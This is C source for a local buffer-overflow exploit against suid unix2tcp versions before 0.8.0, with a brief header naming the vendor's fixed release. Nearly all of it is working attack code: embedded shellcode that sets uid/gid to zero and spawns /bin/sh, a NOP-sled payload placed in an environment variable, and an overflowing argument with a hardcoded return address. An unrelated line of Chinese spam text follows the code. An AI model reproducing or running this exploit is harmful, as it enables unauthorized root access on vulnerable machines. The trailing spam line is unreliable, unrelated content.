/* Lame local exploit for unix2tcp(<0.8.0) , http://dizzy.roedu.net/unix2tcp/ by n2n@linuxmail.org, Eye On Security Research Group [India], http://www.eos-india.net Tested on Redhat Linux 9.0 Not of much use unless unix2tcp is installed suid. Solution: The vendor has released a fixed version (0.8.0), available at: http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.gz http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.bz2 */ #include #include #include #define BUFSIZE 122 #define VULN "/usr/bin/unix2tcp" #define RET 0xbffff8e6 char shellcode[]= "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x2e" "\xcd\x80" "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x01" "\xcd\x80"; int main(int argc,char **argv) { char *buf; unsigned long ret = RET; int offset=0; char egg[2048]; int bufsize=BUFSIZE; printf("*********************************\n"); printf("Exploit by n2n(n2n@linuxmail.org)\n"); printf(" http://www.eos-india.net\n"); printf("*********************************\n\n"); if (argc>1) bufsize=atoi(argv[1]); if (argc>2) offset=atoi(argv[2]); buf=(char *)malloc((bufsize+10)*sizeof(char)); ret = RET + offset; memset(egg, 0x90, 2048); memcpy ((egg+(2048-strlen(shellcode)-1)), shellcode, strlen(shellcode)); setenv("payload", egg, 1); memset(buf,0x41,bufsize+10); memcpy(buf+bufsize,(char *)&ret,4); buf[bufsize+4] = 0x00; execl(VULN,VULN,buf,"31337","31337",0); return 0; }

亚洲欧美在线